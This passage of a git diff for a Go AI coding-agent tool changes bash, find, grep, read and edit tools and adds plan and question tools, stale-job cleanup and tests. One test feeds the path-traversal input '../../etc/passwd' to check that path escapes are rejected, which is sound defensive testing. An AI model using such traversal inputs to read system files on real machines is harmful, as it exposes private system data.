+	}
+
+	exitCode := 0
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			exitCode = exitErr.ExitCode()
 		}
-		output += "STDERR:\n" + stderr.String()
 	}
 
-	// Build result with command info
 	var result strings.Builder
-	result.WriteString(fmt.Sprintf("$ %s\n", command))
-	result.WriteString(fmt.Sprintf("(in %s)\n\n", workDir))
-
-	if output == "" {
-		result.WriteString("(no output)")
-	} else {
-		result.WriteString(output)
-	}
+	result.WriteString("[command]\n")
+	result.WriteString(command)
+	result.WriteString("\n[cwd]\n")
+	result.WriteString(workDir)
+	result.WriteString("\n[stdout]\n")
+	result.WriteString(stdoutStr)
+	result.WriteString("\n[stderr]\n")
+	result.WriteString(stderrStr)
+	result.WriteString("\n[exit_code]\n")
+	result.WriteString(fmt.Sprintf("%d", exitCode))
 
 	// Truncate large outputs
 	const maxOutput = 50000
 	resultStr := result.String()
 	if len(resultStr) > maxOutput {
-		truncated := len(resultStr) - maxOutput
-		resultStr = resultStr[:maxOutput] + fmt.Sprintf("\n... (truncated %d bytes)", truncated)
+		prefix := util.TruncateString(resultStr, maxOutput)
+		truncated := len(resultStr) - len(prefix)
+		resultStr = prefix + fmt.Sprintf("\n... (truncated %d bytes)", truncated)
 	}
 
 	if err != nil {
@@ -266,8 +288,8 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		if errors.Is(err, exec.ErrWaitDelay) {
 			return NewTextToolResult(resultStr), nil
 		}
-		if exitErr, ok := err.(*exec.ExitError); ok {
-			return NewTextToolResult(fmt.Sprintf("%s\nExit code: %d", resultStr, exitErr.ExitCode())), nil
+		if _, ok := err.(*exec.ExitError); ok {
+			return NewTextToolResult(resultStr), nil
 		}
 		return ToolResult{}, fmt.Errorf("command failed: %w\n%s", err, resultStr)
 	}
diff --git a/internal/tools/coverage_test.go b/internal/tools/coverage_test.go
new file mode 100644
index 0000000..40095e7
--- /dev/null
+++ b/internal/tools/coverage_test.go
@@ -0,0 +1,263 @@
+package tools
+
+import (
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+)
+
+// TestToolMetadata tests PromptSnippet, PromptGuidelines, Description for all tools.
+func TestToolMetadata(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaults()
+
+	for _, tool := range r.All() {
+		name := tool.Name()
+		if name == "" {
+			t.Errorf("tool %T has empty name", tool)
+		}
+		if tool.Description() == "" {
+			t.Errorf("tool %s has empty description", name)
+		}
+		if tool.Parameters() == nil {
+			t.Errorf("tool %s has nil parameters", name)
+		}
+		// PromptSnippet and PromptGuidelines - just call them
+		_ = tool.PromptSnippet()
+		_ = tool.PromptGuidelines()
+	}
+}
+
+// TestRegistryConfig tests NewRegistryWithConfig and RegisterFiltered.
+func TestRegistryConfig(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+
+	// With empty filter = all defaults
+	r := NewRegistryWithConfig(RegistryConfig{
+		WorkDir: "/tmp",
+		Sandbox: sb,
+	})
+	if len(r.All()) == 0 {
+		t.Error("expected default tools to be registered")
+	}
+
+	// With filter
+	r2 := NewRegistryWithConfig(RegistryConfig{
+		WorkDir:    "/tmp",
+		Sandbox:    sb,
+		ToolFilter: []string{"read", "write"},
+	})
+	if len(r2.All()) != 2 {
+		t.Errorf("expected 2 tools, got %d", len(r2.All()))
+	}
+	if _, ok := r2.Get("read"); !ok {
+		t.Error("expected 'read' tool")
+	}
+	if _, ok := r2.Get("write"); !ok {
+		t.Error("expected 'write' tool")
+	}
+	if _, ok := r2.Get("bash"); ok {
+		t.Error("did not expect 'bash' tool in filtered registry")
+	}
+}
+
+// TestRegistryJobManager tests per-registry JobManager.
+func TestRegistryJobManager(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r1 := NewRegistry("/tmp", sb)
+	r2 := NewRegistry("/tmp", sb)
+
+	jm1 := r1.JobManager()
+	jm2 := r2.JobManager()
+
+	if jm1 == nil || jm2 == nil {
+		t.Fatal("expected non-nil JobManagers")
+	}
+	if jm1 == jm2 {
+		t.Error("expected different JobManager instances per registry")
+	}
+}
+
+// TestRegistryModeTools tests ModeTools filtering.
+func TestRegistryModeTools(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaults()
+
+	planTools := r.ModeTools("plan")
+	allTools := r.ModeTools("agent")
+
+	if len(planTools) >= len(allTools) {
+		t.Errorf("plan should have fewer tools than agent: plan=%d agent=%d", len(planTools), len(allTools))
+	}
+
+	// Plan mode should only have read-only tools
+	planNames := make(map[string]bool)
+	for _, td := range planTools {
+		planNames[td.Name] = true
+	}
+	for _, name := range []string{"read", "grep", "find", "ls", "plan"} {
+		if !planNames[name] {
+			t.Errorf("plan mode missing tool: %s", name)
+		}
+	}
+	if planNames["write"] {
+		t.Error("plan mode should not have write tool")
+	}
+	if planNames["bash"] {
+		t.Error("plan mode should not have bash tool")
+	}
+}
+
+// TestToolSnippets tests ToolSnippets and ToolGuidelines.
+func TestToolSnippets(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaults()
+
+	snippets := r.ToolSnippets([]string{"read", "write", "bash"})
+	if len(snippets) == 0 {
+		t.Error("expected non-empty snippets")
+	}
+
+	guidelines := r.ToolGuidelines([]string{"read", "write", "bash"})
+	// Guidelines may be nil if tools don't define them
+	_ = guidelines
+}
+
+// TestRegistryResolvePath tests path resolution.
+func TestRegistryResolvePath(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/home/user/project", sb)
+
+	// Relative path
+	resolved, err := r.ResolvePath("src/main.go")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if resolved != "/home/user/project/src/main.go" {
+		t.Errorf("expected /home/user/project/src/main.go, got %s", resolved)
+	}
+
+	// Absolute path within workdir
+	resolved, err = r.ResolvePath("/home/user/project")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if resolved != "/home/user/project" {
+		t.Errorf("expected /home/user/project, got %s", resolved)
+	}
+
+	// Path escape should fail
+	_, err = r.ResolvePath("../../etc/passwd")
+	if err == nil {
+		t.Error("expected error for path escape")
+	}
+
+	// Sibling directory with same prefix should fail.
+	_, err = r.ResolvePath("/home/user/project2/file.txt")
+	if err == nil {
+		t.Error("expected error for sibling prefix path escape")
+	}
+
+	// Tilde expansion - may fail if home is outside workdir
+	_, err = r.ResolvePath("~")
+	// This is expected to fail if home dir is outside workdir
+	_ = err
+}
+
+// TestSetSandbox tests SetSandbox.
+func TestSetSandbox(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+
+	newSb := sandbox.NewNoneSandbox()
+	r.SetSandbox(newSb)
+
+	if r.GetSandbox() != newSb {
+		t.Error("expected updated sandbox")
+	}
+}
+
+// TestLimitedBuffer_Truncate verifies that limitedBuffer truncates output at maxSize.
+func TestLimitedBuffer_Truncate(t *testing.T) {
+	lb := newLimitedBuffer(100)
+
+	// Write less than max — no truncation
+	lb.Write([]byte("hello"))
+	out := lb.Bytes()
+	if string(out) != "hello" {
+		t.Fatalf("expected 'hello', got %q", string(out))
+	}
+
+	// Write more than max — should truncate
+	lb2 := newLimitedBuffer(100)
+	bigData := make([]byte, 200)
+	for i := range bigData {
+		bigData[i] = 'A'
+	}
+	lb2.Write(bigData)
+	out2 := lb2.Bytes()
+	if len(out2) != 100+len("\n... (truncated 100 bytes)") {
+		t.Errorf("expected truncated output of length %d, got %d: %q",
+			100+len("\n... (truncated 100 bytes)"), len(out2), string(out2))
+	}
+	if !strings.Contains(string(out2), "truncated") {
+		t.Error("expected truncation suffix")
+	}
+}
+
+// TestJobManager_GCStaleJobs verifies stale finished jobs are cleaned up.
+func TestJobManager_GCStaleJobs(t *testing.T) {
+	jm := NewJobManager()
+
+	// Simulate jobs by directly inserting them.
+	// Running job should survive GC.
+	runningJob := &BackgroundJob{ID: 1, Command: "running", StartTime: time.Now().Add(-1 * time.Hour)}
+	jm.jobs[1] = runningJob
+
+	// Finished job that's young — should survive GC.
+	youngDone := &BackgroundJob{ID: 2, Command: "young-done", StartTime: time.Now(), done: true}
+	jm.jobs[2] = youngDone
+
+	// Finished job that's stale (finished >30min ago) — should be cleaned.
+	staleDone := &BackgroundJob{ID: 3, Command: "stale-done", StartTime: time.Now().Add(-1 * time.Hour), done: true}
+	jm.jobs[3] = staleDone
+
+	// Trigger GC via AddJob (we need a real exec.Cmd for AddJob, so call gcStaleJobsLocked directly).
+	jm.mu.Lock()
+	jm.lastGC = time.Time{} // force GC
+	jm.gcStaleJobsLocked()
+	jm.mu.Unlock()
+
+	if _, ok := jm.jobs[1]; !ok {
+		t.Error("running job should not be removed")
+	}
+	if _, ok := jm.jobs[2]; !ok {
+		t.Error("young done job should not be removed")
+	}
+	if _, ok := jm.jobs[3]; ok {
+		t.Error("stale done job should have been removed")
+	}
+}
+
+// TestJobManager_GCSkipIfRecent verifies GC is skipped if last GC was recent.
+func TestJobManager_GCSkipIfRecent(t *testing.T) {
+	jm := NewJobManager()
+
+	staleDone := &BackgroundJob{ID: 1, Command: "stale", StartTime: time.Now().Add(-1 * time.Hour), done: true}
+	jm.jobs[1] = staleDone
+
+	jm.lastGC = time.Now() // recent GC — should skip
+
+	jm.mu.Lock()
+	jm.gcStaleJobsLocked()
+	jm.mu.Unlock()
+
+	if _, ok := jm.jobs[1]; !ok {
+		t.Error("stale job should NOT be removed when GC was recent")
+	}
+}
diff --git a/internal/tools/edit.go b/internal/tools/edit.go
index d00df52..5021570 100644
--- a/internal/tools/edit.go
+++ b/internal/tools/edit.go
@@ -84,7 +84,8 @@ func (t *EditTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	if err != nil {
 		return ToolResult{}, fmt.Errorf("read file: %w", err)
 	}
-	content := string(data)
+	originalContent := string(data)
+	content := originalContent
 
 	editsRaw, ok := params["edits"].([]any)
 	if !ok || len(editsRaw) == 0 {
@@ -156,5 +157,6 @@ func (t *EditTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		return ToolResult{}, fmt.Errorf("write file: %w", err)
 	}
 
-	return NewTextToolResult(fmt.Sprintf("Applied %d edit(s) to %s", len(edits), path)), nil
+	diff := BuildFileDiff(path, originalContent, content)
+	return NewDiffToolResult(fmt.Sprintf("Applied %d edit(s) to %s\n%s", len(edits), path, formatFileDiffSummary(diff)), diff), nil
 }
diff --git a/internal/tools/find.go b/internal/tools/find.go
index a2aaac4..0c2287a 100644
--- a/internal/tools/find.go
+++ b/internal/tools/find.go
@@ -4,9 +4,11 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"os/exec"
-	"regexp"
+	"path/filepath"
+	"sort"
 	"strings"
 
 	"github.com/startvibecoding/vibecoding/internal/vendored"
@@ -61,42 +63,6 @@ func (t *FindTool) Parameters() json.RawMessage {
 	}`)
 }
 
-// globToRegex 将 glob 模式转换为正则表达式
-// 例如: *.go → \.go$, *.test.* → \.test\..*
-func globToRegex(pattern string) string {
-	var result strings.Builder
-	result.WriteString("^")
-
-	for i := 0; i < len(pattern); i++ {
-		c := pattern[i]
-		switch c {
-		case '*':
-			result.WriteString(".*")
-		case '?':
-			result.WriteString(".")
-		case '.':
-			result.WriteString("\\.")
-		case '{':
-			// 处理 {a,b} 这种模式
-			result.WriteString("(?:")
-		case '}':
-			result.WriteString(")")
-		case ',':
-			// 在 {a,b} 内部的逗号
-			result.WriteString("|")
-		default:
-			// 转义特殊正则字符
-			if strings.ContainsRune(`\+^${}|[]()`, rune(c)) {
-				result.WriteByte('\\')
-			}
-			result.WriteByte(c)
-		}
-	}
-
-	result.WriteString("$")
-	return result.String()
-}
-
 func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
 	pattern, _ := params["pattern"].(string)
 	if pattern == "" {
@@ -122,22 +88,19 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		maxResults = int(v)
 	}
 
-	// 获取 fd 路径
-	fdPath := vendored.FdPath()
-	if fdPath == "" {
-		return ToolResult{}, fmt.Errorf("fd 未安装，请先运行 make prepare-vendored")
-	}
-
-	// 将 glob 模式转为正则
-	regexPattern := globToRegex(pattern)
-	// 验证正则是否有效
-	if _, err := regexp.Compile(regexPattern); err != nil {
-		return ToolResult{}, fmt.Errorf("invalid pattern %q: %w", pattern, err)
+	// 选择可用的 fd 命令，当前平台没有内嵌 fd 时退回系统 find。
+	fdPath, err := resolveFdPath()
+	if err != nil {
+		if errors.Is(err, vendored.ErrUnsupportedPlatform) {
+			return executeNativeFind(ctx, pattern, searchPath, maxDepth, maxResults)
+		}
+		return ToolResult{}, err
 	}
 
 	// 构建 fd 命令参数
 	args := []string{
 		"--color=never",
+		"--glob",
 		fmt.Sprintf("--max-results=%d", maxResults),
 	}
 
@@ -145,8 +108,7 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		args = append(args, fmt.Sprintf("--max-depth=%d", maxDepth))
 	}
 
-	// fd 使用正则匹配
-	args = append(args, "--", regexPattern, searchPath)
+	args = append(args, "--", pattern, searchPath)
 
 	// 执行 fd
 	cmd := exec.CommandContext(ctx, fdPath, args...)
@@ -154,7 +116,7 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	cmd.Stdout = &stdout
 	cmd.Stderr = &stderr
 
-	err := cmd.Run()
+	err = cmd.Run()
 	if err != nil {
 		// fd 返回 1 表示没有匹配
 		if exitErr, ok := err.(*exec.ExitError); ok && exitErr.ExitCode() == 1 {
@@ -165,6 +127,9 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		if errMsg != "" {
 			return ToolResult{}, fmt.Errorf("fd 执行失败: %s", errMsg)
 		}
+		if isExecFormatError(err) {
+			return executeNativeFind(ctx, pattern, searchPath, maxDepth, maxResults)
+		}
 		return ToolResult{}, fmt.Errorf("fd 执行失败: %w", err)
 	}
 
@@ -176,3 +141,65 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// fd 输出就是每行一个路径，与原实现格式一致
 	return NewTextToolResult(output), nil
 }
+
+func resolveFdPath() (string, error) {
+	if !vendored.HasEmbeddedTools() {
+		return "", fmt.Errorf("%w", vendored.ErrUnsupportedPlatform)
+	}
+
+	fdPath := vendored.FdPath()
+	if fdPath == "" {
+		return "", fmt.Errorf("无法确定 fd 路径")
+	}
+
+	// 缺失或不可执行时，尝试从 go:embed 释放到 ~/.vibecoding/bin/
+	if err := vendored.Ensure(); err != nil {
+		return "", fmt.Errorf("准备 fd 失败: %w", err)
+	}
+
+	return fdPath, nil
+}
+
+func executeNativeFind(ctx context.Context, pattern, searchPath string, maxDepth, maxResults int) (ToolResult, error) {
+	findPath, err := exec.LookPath("find")
+	if err != nil {
+		return ToolResult{}, fmt.Errorf("fd is unsupported on this platform and system find was not found: %w", err)
+	}
+
+	args := []string{searchPath}
+	if maxDepth >= 0 {
+		args = append(args, "-maxdepth", fmt.Sprintf("%d", maxDepth))
+	}
+	args = append(args, "-type", "f")
+
+	pathPattern := pattern
+	if !filepath.IsAbs(pathPattern) {
+		pathPattern = filepath.Join(searchPath, filepath.FromSlash(pattern))
+	}
+	args = append(args, "(", "-name", pattern, "-o", "-path", pathPattern, ")")
+
+	cmd := exec.CommandContext(ctx, findPath, args...)
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	if err := cmd.Run(); err != nil {
+		errMsg := strings.TrimSpace(stderr.String())
+		if errMsg != "" {
+			return ToolResult{}, fmt.Errorf("find execution failed: %s", errMsg)
+		}
+		return ToolResult{}, fmt.Errorf("find execution failed: %w", err)
+	}
+
+	output := strings.TrimSpace(stdout.String())
+	if output == "" {
+		return NewTextToolResult("(no files found)"), nil
+	}
+
+	lines := strings.Split(output, "\n")
+	sort.Strings(lines)
+	if maxResults > 0 && len(lines) > maxResults {
+		lines = lines[:maxResults]
+	}
+	return NewTextToolResult(strings.Join(lines, "\n")), nil
+}
diff --git a/internal/tools/grep.go b/internal/tools/grep.go
index e6d63af..b082f9e 100644
--- a/internal/tools/grep.go
+++ b/internal/tools/grep.go
@@ -4,6 +4,7 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"os/exec"
 	"strings"
@@ -82,9 +83,12 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	}
 
 	// 获取 rg 路径
-	rgPath := vendored.RgPath()
-	if rgPath == "" {
-		return ToolResult{}, fmt.Errorf("ripgrep (rg) 未安装，请先运行 make prepare-vendored")
+	rgPath, err := resolveRgPath()
+	if err != nil {
+		if errors.Is(err, vendored.ErrUnsupportedPlatform) {
+			return executeNativeGrep(ctx, pattern, searchPath, include, maxResults)
+		}
+		return ToolResult{}, err
 	}
 
 	// 构建 rg 命令参数
@@ -107,7 +111,7 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	cmd.Stdout = &stdout
 	cmd.Stderr = &stderr
 
-	err := cmd.Run()
+	err = cmd.Run()
 	if err != nil {
 		// rg 返回 1 表示没有匹配，这不是错误
 		if exitErr, ok := err.(*exec.ExitError); ok && exitErr.ExitCode() == 1 {
@@ -118,6 +122,9 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		if errMsg != "" {
 			return ToolResult{}, fmt.Errorf("rg 执行失败: %s", errMsg)
 		}
+		if isExecFormatError(err) {
+			return executeNativeGrep(ctx, pattern, searchPath, include, maxResults)
+		}
 		return ToolResult{}, fmt.Errorf("rg 执行失败: %w", err)
 	}
 
@@ -130,3 +137,76 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// 与原实现格式一致: file:line: content
 	return NewTextToolResult(output), nil
 }
+
+func resolveRgPath() (string, error) {
+	if !vendored.HasEmbeddedTools() {
+		return "", fmt.Errorf("%w", vendored.ErrUnsupportedPlatform)
+	}
+
+	rgPath := vendored.RgPath()
+	if rgPath == "" {
+		return "", fmt.Errorf("无法确定 rg 路径")
+	}
+
+	// 缺失或不可执行时，尝试从 go:embed 释放到 ~/.vibecoding/bin/
+	if err := vendored.Ensure(); err != nil {
+		return "", fmt.Errorf("准备 rg 失败: %w", err)
+	}
+
+	return rgPath, nil
+}
+
+func executeNativeGrep(ctx context.Context, pattern, searchPath, include string, maxResults int) (ToolResult, error) {
+	grepPath, err := exec.LookPath("grep")
+	if err != nil {
+		return ToolResult{}, fmt.Errorf("rg is unsupported on this platform and system grep was not found: %w", err)
+	}
+
+	args := []string{"-R", "-n", "-E", "-I", "--color=never"}
+	if include != "" {
+		args = append(args, "--include="+include)
+	}
+	args = append(args, "--", pattern, searchPath)
+
+	cmd := exec.CommandContext(ctx, grepPath, args...)
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	err = cmd.Run()
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok && exitErr.ExitCode() == 1 {
+			return NewTextToolResult("(no matches found)"), nil
+		}
+		errMsg := strings.TrimSpace(stderr.String())
+		if errMsg != "" {
+			return ToolResult{}, fmt.Errorf("grep execution failed: %s", errMsg)
+		}
+		return ToolResult{}, fmt.Errorf("grep execution failed: %w", err)
+	}
+
+	output := limitOutputLines(stdout.String(), maxResults)
+	if output == "" {
+		return NewTextToolResult("(no matches found)"), nil
+	}
+	return NewTextToolResult(output), nil
+}
+
+func isExecFormatError(err error) bool {
+	return strings.Contains(strings.ToLower(err.Error()), "exec format error")
+}
+
+func limitOutputLines(output string, maxResults int) string {
+	output = strings.TrimSpace(output)
+	if output == "" {
+		return ""
+	}
+	if maxResults <= 0 {
+		return output
+	}
+	lines := strings.Split(output, "\n")
+	if len(lines) > maxResults {
+		lines = lines[:maxResults]
+	}
+	return strings.Join(lines, "\n")
+}
diff --git a/internal/tools/jobmanager.go b/internal/tools/jobmanager.go
index ce30eb8..86cd149 100644
--- a/internal/tools/jobmanager.go
+++ b/internal/tools/jobmanager.go
@@ -26,9 +26,10 @@ type BackgroundJob struct {
 
 // JobManager manages background processes.
 type JobManager struct {
-	jobs   map[int]*BackgroundJob
-	nextID int
-	mu     sync.RWMutex
+	jobs     map[int]*BackgroundJob
+	nextID   int
+	mu       sync.RWMutex
+	lastGC   time.Time // last time stale jobs were cleaned up
 }
 
 // NewJobManager creates a new job manager.
@@ -43,6 +44,8 @@ func (jm *JobManager) AddJob(cmd *exec.Cmd, command string, cancel context.Cance
 	jm.mu.Lock()
 	defer jm.mu.Unlock()
 
+	jm.gcStaleJobsLocked()
+
 	jm.nextID++
 	job := &BackgroundJob{
 		ID:        jm.nextID,
@@ -143,3 +146,22 @@ func (job *BackgroundJob) Status() string {
 	}
 	return fmt.Sprintf("[%d] running (PID: %d, %s, elapsed: %s)", job.ID, job.PID, job.Command, elapsed)
 }
+
+const staleJobTTL = 30 * time.Minute
+
+// gcStaleJobsLocked removes finished jobs older than staleJobTTL.
+// Caller must hold jm.mu.
+func (jm *JobManager) gcStaleJobsLocked() {
+	if time.Since(jm.lastGC) < 5*time.Minute {
+		return
+	}
+	jm.lastGC = time.Now()
+	for id, job := range jm.jobs {
+		job.mu.Lock()
+		stale := job.done && time.Since(job.StartTime) > staleJobTTL
+		job.mu.Unlock()
+		if stale {
+			delete(jm.jobs, id)
+		}
+	}
+}
diff --git a/internal/tools/plan.go b/internal/tools/plan.go
new file mode 100644
index 0000000..bfb1116
--- /dev/null
+++ b/internal/tools/plan.go
@@ -0,0 +1,134 @@
+package tools
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+)
+
+// PlanTool publishes a structured task plan for UI and audit surfaces.
+type PlanTool struct {
+	registry *Registry
+}
+
+// NewPlanTool creates a new plan tool.
+func NewPlanTool(r *Registry) *PlanTool {
+	return &PlanTool{registry: r}
+}
+
+func (t *PlanTool) Name() string { return "plan" }
+
+func (t *PlanTool) Description() string {
+	return "Publish or update a structured task plan with step statuses."
+}
+
+func (t *PlanTool) PromptSnippet() string {
+	return "Publish a visible task plan with pending, running, done, or failed steps"
+}
+
+func (t *PlanTool) PromptGuidelines() []string {
+	return []string{
+		"Use plan before making code changes for multi-step tasks.",
+		"Update plan step statuses as work progresses.",
+		"Keep plan steps concise and actionable.",
+	}
+}
+
+func (t *PlanTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"title": {
+				"type": "string",
+				"description": "Short title for the current task plan"
+			},
+			"steps": {
+				"type": "array",
+				"description": "Ordered task steps with statuses",
+				"items": {
+					"type": "object",
+					"properties": {
+						"title": {
+							"type": "string",
+							"description": "Concise step description"
+						},
+						"status": {
+							"type": "string",
+							"enum": ["pending", "running", "done", "failed"],
+							"description": "Current step status"
+						}
+					},
+					"required": ["title", "status"]
+				}
+			},
+			"note": {
+				"type": "string",
+				"description": "Optional short note about risks, blockers, or next action"
+			}
+		},
+		"required": ["steps"]
+	}`)
+}
+
+func (t *PlanTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
+	title, _ := params["title"].(string)
+	note, _ := params["note"].(string)
+	stepsRaw, ok := params["steps"].([]any)
+	if !ok || len(stepsRaw) == 0 {
+		return ToolResult{}, fmt.Errorf("steps array is required and must not be empty")
+	}
+
+	plan := &TaskPlan{
+		Title: strings.TrimSpace(title),
+		Note:  strings.TrimSpace(note),
+		Steps: make([]PlanStep, 0, len(stepsRaw)),
+	}
+	for i, raw := range stepsRaw {
+		m, ok := raw.(map[string]any)
+		if !ok {
+			return ToolResult{}, fmt.Errorf("step %d: invalid step format", i)
+		}
+		stepTitle, _ := m["title"].(string)
+		stepTitle = strings.TrimSpace(stepTitle)
+		if stepTitle == "" {
+			return ToolResult{}, fmt.Errorf("step %d: title is required", i)
+		}
+		status, _ := m["status"].(string)
+		status = normalizePlanStatus(status)
+		if status == "" {
+			return ToolResult{}, fmt.Errorf("step %d: status must be pending, running, done, or failed", i)
+		}
+		plan.Steps = append(plan.Steps, PlanStep{Title: stepTitle, Status: status})
+	}
+
+	return NewPlanToolResult(formatTaskPlan(plan), plan), nil
+}
+
+func normalizePlanStatus(status string) string {
+	switch strings.ToLower(strings.TrimSpace(status)) {
+	case "pending", "running", "done", "failed":
+		return strings.ToLower(strings.TrimSpace(status))
+	default:
+		return ""
+	}
+}
+
+func formatTaskPlan(plan *TaskPlan) string {
+	if plan == nil {
+		return "Plan updated."
+	}
+	var sb strings.Builder
+	if plan.Title != "" {
+		sb.WriteString("Plan: " + plan.Title + "\n")
+	} else {
+		sb.WriteString("Plan updated:\n")
+	}
+	for _, step := range plan.Steps {
+		sb.WriteString(fmt.Sprintf("- [%s] %s\n", step.Status, step.Title))
+	}
+	if plan.Note != "" {
+		sb.WriteString("Note: " + plan.Note)
+	}
+	return strings.TrimRight(sb.String(), "\n")
+}
diff --git a/internal/tools/question.go b/internal/tools/question.go
new file mode 100644
index 0000000..69b8916
--- /dev/null
+++ b/internal/tools/question.go
@@ -0,0 +1,112 @@
+package tools
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+)
+
+// QuestionTool asks the user a multiple-choice question during plan mode.
+type QuestionTool struct {
+	registry *Registry
+}
+
+// NewQuestionTool creates a new question tool.
+func NewQuestionTool(r *Registry) *QuestionTool {
+	return &QuestionTool{registry: r}
+}
+
+func (t *QuestionTool) Name() string { return "question" }
+
+func (t *QuestionTool) Description() string {
+	return "Ask the user a question with predefined options to clarify requirements before forming a plan. The user selects an option or provides a custom answer."
+}
+
+func (t *QuestionTool) PromptSnippet() string {
+	return "Ask the user a multiple-choice question to clarify requirements"
+}
+
+func (t *QuestionTool) PromptGuidelines() []string {
+	return []string{
+		"Use question when you need the user to make a decision or clarify requirements before planning",
+		"Provide clear, concise options that cover the main choices",
+		"The last option is always 'Custom input' — the user can type their own answer",
+		"Use context to explain why you're asking and what each option means",
+		"Ask one question at a time for clarity",
+	}
+}
+
+func (t *QuestionTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"question": {
+				"type": "string",
+				"description": "The question to ask the user"
+			},
+			"options": {
+				"type": "array",
+				"items": {"type": "string"},
+				"description": "Predefined options for the user to choose from"
+			},
+			"context": {
+				"type": "string",
+				"description": "Optional context or explanation for why you're asking this question"
+			}
+		},
+		"required": ["question", "options"]
+	}`)
+}
+
+// QuestionAsker is the interface the tool uses to interact with the user.
+// The agent implements this via RequestQuestion.
+type QuestionAsker interface {
+	AskQuestion(ctx context.Context, question string, options []string, context string) string
+}
+
+func (t *QuestionTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
+	question, _ := params["question"].(string)
+	if question == "" {
+		return ToolResult{}, fmt.Errorf("question is required")
+	}
+
+	optionsRaw, ok := params["options"].([]any)
+	if !ok || len(optionsRaw) == 0 {
+		return ToolResult{}, fmt.Errorf("options array is required and must not be empty")
+	}
+
+	var options []string
+	for i, raw := range optionsRaw {
+		opt, ok := raw.(string)
+		if !ok {
+			return ToolResult{}, fmt.Errorf("option %d must be a string", i)
+		}
+		options = append(options, strings.TrimSpace(opt))
+	}
+
+	explanation, _ := params["context"].(string)
+
+	// Look for the QuestionAsker in the context
+	asker, ok := ctx.Value(questionAskerKey{}).(QuestionAsker)
+	if !ok {
+		return ToolResult{}, fmt.Errorf("question tool: no question handler available in context")
+	}
+
+	answer := asker.AskQuestion(ctx, question, options, explanation)
+	if answer == "" {
+		return ToolResult{}, fmt.Errorf("no answer received (user may have aborted)")
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("User answered: %s\n", answer))
+	return NewTextToolResult(sb.String()), nil
+}
+
+// questionAskerKey is the context key for the QuestionAsker.
+type questionAskerKey struct{}
+
+// ContextWithQuestionAsker attaches a QuestionAsker to the context.
+func ContextWithQuestionAsker(ctx context.Context, asker QuestionAsker) context.Context {
+	return context.WithValue(ctx, questionAskerKey{}, asker)
+}
diff --git a/internal/tools/read.go b/internal/tools/read.go
index dc486bd..4cfd1ff 100644
--- a/internal/tools/read.go
+++ b/internal/tools/read.go
@@ -8,6 +8,8 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/util"
 )
 
 // ReadTool reads file contents.
@@ -64,6 +66,8 @@ var imageMimeType = map[string]string{
 	".webp": "image/webp",
 }
 
+const maxImageFileBytes = 10 << 20
+
 func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
 	path, _ := params["path"].(string)
 	if path == "" {
@@ -78,6 +82,13 @@ func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// Check for image files
 	ext := strings.ToLower(filepath.Ext(path))
 	if mimeType, ok := imageMimeType[ext]; ok {
+		info, err := os.Stat(path)
+		if err != nil {
+			return ToolResult{}, fmt.Errorf("cannot stat image file: %w", err)
+		}
+		if info.Size() > maxImageFileBytes {
+			return ToolResult{}, fmt.Errorf("image file too large: %d bytes (max %d)", info.Size(), maxImageFileBytes)
+		}
 		data, err := os.ReadFile(path)
 		if err != nil {
 			return ToolResult{}, fmt.Errorf("cannot read image file: %w", err)
@@ -129,7 +140,7 @@ func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// Truncate
 	const maxBytes = 50000
 	if len(result) > maxBytes {
-		result = result[:maxBytes] + fmt.Sprintf("\n... (truncated, total %d lines)", len(lines))
